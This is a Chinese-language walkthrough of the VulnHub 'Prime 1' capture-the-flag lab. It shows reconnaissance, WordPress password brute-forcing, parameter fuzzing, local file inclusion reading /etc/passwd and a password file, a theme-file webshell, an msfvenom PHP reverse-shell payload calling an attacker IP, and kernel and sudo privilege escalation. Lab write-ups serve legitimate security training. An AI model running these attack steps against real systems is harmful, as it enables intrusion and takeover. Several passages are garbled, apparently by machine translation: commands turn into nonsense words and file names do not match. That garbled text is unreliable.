本帖最后由 zhaorong 于 2021-11-10 15:46 编辑

前言

靶机地址：https://www.vulnhub.com/entry/prime-1,358/

本次靶机涉及到的知识点：

Web 信息收集
Fuzz 基础使用
文件包含利用
Wordpress 主题文件 Getshell
Ubuntu 16.04 内核权限提权
Sudo 提

信息

首先使用 arp-scan 扫描资产：

arp-scan --interface=eth0 192.168.226.0/24


发现目标主机192.168.226.132，使用nmap做进一步端口扫描：

nmap -sC -sV -p- -sT 192.168.226.132


发现目标机看到22和80这两个端口，先访问80口：


就这一张图片。

使用dirsearch扫描目录发现存在wordpress目录：

dirsearch -u http://192.168.226.132/ -e*



一看到wordpress就考虑先用wpscan扫一波。

首先用wpscan枚举用户名：

wpscan --url http://192.168.226.132/wordpress/ --enumerate u


发现一个胜利者用户接下来就是寻找胜利者用户的密码登录

进入写Webshel​​l了。首先尝试爆破，先使用cewl爬取整个网站上的关键字并生成一个字典：

cewl http://192.168.226.132/wordpress/ > 词表.txt


然后使用 wpscan 并配合刚生成的字典进行爆破：

wpscan --url http://192.168.226.132/wordpress/ -U victor -P wordlists.txt


爆破失败……


继续寻找突破口又换了一个你的字典扫了波目录：


如上图，还是发现了一个secret.txt，看来需要一个自己的字典啊
访问secret.txt得到如下：


让查看位置.txt 但是这个位置
.txt 不在当前网络目录中并且提示到了 Fuzz 我想应该是让我们 Fuzz 一下参数 找到文件让我们能够确定目标机上某处的位置
.txt 使用 wfuzz 扫描。 ：

wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 --hw
12 http://192.168.226.132/index.php?FUZZ=shit

隐藏掉所有响应报文字数为12 的结果后得到了一个文件 参数：


直接文件包含利用：

/index.php?file=location.txt


如上图，成功读取到了 location.txt 的内容并提示让我们在其他 PHP 文件上使用 secrettier360
参数应该是 image.php 了先模糊一下看看：

wfuzz -c -w /usr/share/wfuzz/wordlist/ general/common.txt --hc 404 --hw
500 http://192.168.226.132/image.php?secrettier360=FUZZ


发现该参数可以访问 dev 并且使用？secrettier360=dev 与直接访问 dev 目录得到的内容是一样的：



所以说这里应该也有文件公开漏洞利用点如下图成功并读取了/etc/passw：


并且在用户的信息中可以看到，其主目录里面有一个password.txt，直接读取之：

/image.php?secrettier360=/home/saket/password.txt


开始攻击

先尝试使用该密码登录为用户的SSH失败了使用victor用户登录也了之后又
使用了改密码登录victor用户的wordpress后台成功：


然后修改主题里面的PHP文件写入Webshel​​l：


蚁剑连接成功：


发现旗不在根目录（老CTFer了……）应该在/root目录里面接下来就是提权了。

权限

提升漏洞提权

查看目标机系统版本：


使用 searchsploit 搜索 Ubuntu 16.04 存在的漏洞：


发现一个本地权限提升漏洞使用-m参数将利用脚本复制到当前的工作目录：

searchsploit -mexploit/linux/local/45010.c


使用 gcc 编译成可执行文件：

gcc 450010.c -o exp

然后将生成的 exp 上传到目标主机的 /tmp 目录中……赋予权限权限后运行失败了应该是此时引起 Shell 了
然后使用 bash失败失败，用 netcat 反弹反弹却发现弹壳 -e 参数被阉割了……
无奈我只能选择用 metasploit 了生成一个 PHP 的马：

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.226.128 lport=4444 -f raw -o shell.php

将生成的 Webshel​​l 内容写入到上面的主题文件里，然后再访问测试上线：


然后切换到 Shell 中并使用 python 模拟一个终端，进入到 /tmp 重执行 exp：


如上图所示，成功拿到了root权限然后在/root目录里面发现并读取到了flag：


sudo 提权

我们在发现目标机的壳之后 sudo 那我们可以考虑
一下 sudo 提权。执行 sudo -l：


如上图所示发现当前用户无需输入密码即可以root权限执行/home/saket/enc但

要执行/home/saket/enc的话需要输入密码：


我们在 /opt 目录中发现了一个备份的密码：


使用该密码可以成功执行 /home/saket/enc：

sudo /home/saket/enc


执行后在saket的主目录中生成了一个key.txt文件和一个enc.txt这个enc.txt
是一个AES智能的玩意。查看key.txt：


用字符串“ippsec 的MD5值作为秘诀提示去意”.txt 这个玩意我们从网上随便
找了一个 AES 的宝宝的网站直接细菌：


如上图所示得到saket用户的真实密码为“tribute_to_ippsec”。

切换到saket用户再次尝试sudo提权：


如上图所示发现saket可以不输入密码即以root权限执行/home/victor/undefeated_victor。执行以下查看：


发现会，报错/tmp/challenge 没有找到。按照正常思路应该是/home/victor/undefeated_victor
会去执行/tmp/challenge，那我们便可以将恶意命令写入/tmp/challenge中，当以root权限执行
的/ home /维克托/ undefeated_victor时，便会以根权限执行的/ tmp /挑战中的命令。

回声IyEvYmluL2Jhc2gKL2Jpbi9iYXNo |的base64 -d>的/ tmp /挑战
使用chmod + X的/ tmp /挑战

这里直接将“/斌/庆典” 写入/tmp/challenge中如下图所示，执行/home/victor/
undefeated_victor后成功获得了一个root权限的bash：


成功提权。